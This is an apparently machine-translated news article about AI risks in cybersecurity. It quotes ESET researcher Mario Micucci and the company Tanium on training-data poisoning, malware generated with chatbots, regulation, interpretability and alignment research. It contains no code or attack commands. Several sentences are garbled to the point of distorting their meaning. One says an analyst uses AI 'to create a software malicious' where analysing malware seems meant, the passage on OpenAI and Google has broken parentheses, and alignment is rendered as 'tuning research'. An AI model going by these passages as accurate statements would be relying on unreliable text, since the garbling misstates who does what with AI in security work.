It’s hard these days to have a discussion about technology and not bring up the topic of artificial intelligence. That it is dangerous, that it represents the end of humanity as we know it, that it represents an important leap in the evolution of society, etc.

And the truth is that when OpenAI’s ChatGPT was released to the general public at the end of November last year, it caused a shock to the global society, as no application in history saw a growth of one million registered users five days after its launch. presentation and after a month the chatbot broke the 100 million mark.

For representatives of the technology company Tanium, the unbridled enthusiasm for the products of AI applications was soon clouded by concerns about their impact on society: treating the results uncritically, some of which are hallucinations, is as worrisome as questions about its disruptive properties of it for the education system, the danger of scalable and free disinformation campaigns, low-spectrum access to malicious code, and finally about compliance and copyright that are still unresolved.

Mario Micucci, ESET security researcher for Latin America, says the first thing is to distinguish between artificial intelligence and machine learning. “From the media or from marketing, they talk about artificial intelligence as a whole. And the truth is that artificial intelligence is still science fiction, because artificial intelligence is that imitation of human behavior,” the expert adds.

So, What are these main risks of artificial intelligence in cybersecurity?

The risks are diverse and in different directions. For the expert, it is important to establish that what we are actually experiencing today is the machine learning, which is just a branch of artificial intelligence.

So the risks are in the possibility of violating the algorithms. Use the machine learning to manipulate the results of a system. “We must not forget that every time a system is developed on which to base it machine learning, that is, in machine learning, you have to teach him to make decisions, decisions based on a bunch of data,” explains Micucci.

In this sense, it is a problem if there is someone who changes the training of the data, which can mean a problem in the quality and integrity of the data used and, as a result, an unfavorable result that can pose risks.

On the other hand, on a more general level, it is more focused on the end user. “Opponents who abuse artificial intelligence systems based on machine learning, for example, we can grab ChatGPT and tell it, ‘Okay, I want a malware of such characteristics’. Then just place this instruction to the malware. This represents a dexterity in creating malware and malicious code that did not exist before,” concludes the ESET expert.

Arrange and involve experts

Countries like Italy and China have tried to restrict the use of ChatGPT, as they are early examples of regulatory approaches that are still complicated because even the best AI developers at OpenAI and Google can’t understand (or understand) the details of how results don’t want to disclose). have been made from his generative AI models, a situation that should be taken as a warning sign.

For the company Tanium, in the eyes of investors and developers, nothing short of the greatest development model in human history is at stake, with the promise of nearly limitless automated value creation, quantum leaps in science, and resulting increased prosperity for all of humanity.

But at the same time, only a handful of researchers worldwide are engaged in AI security disciplines which would be, as the first discipline, interpretability, which is concerned with developing a deep understanding of how outcomes are produced from the various AI models. Only with the help of this insight can future AI behavior be predicted and harmful consequences avoided.

But it’s not all negative, the second discipline of AI security is tuning research, which aims to equip current (weak) and future (strong) AI models and agents with the core and fundamental values ​​of humanity and these to integrate into its essence. .

Just as it was mentioned that a cyber attacker can use AI to attack a malwareAn analyst can also use this tool to create a software malicious. That is, you can submit a sample of malicious code and have it analyzed and find the indicators of a compromise. So a job that requires many hours of reverse engineering and intellectual work for the analyst is done by a machine in less time.

“In fact, we are talking about another technological revolution,” says Mario Micucci, adding: “We have already experienced similar technological revolutions in history. In other words, at one point, the ATM we use today to withdraw money with our card was a person. However, the people who filled that role migrated to other types of positions that involve knowing how to operate systems.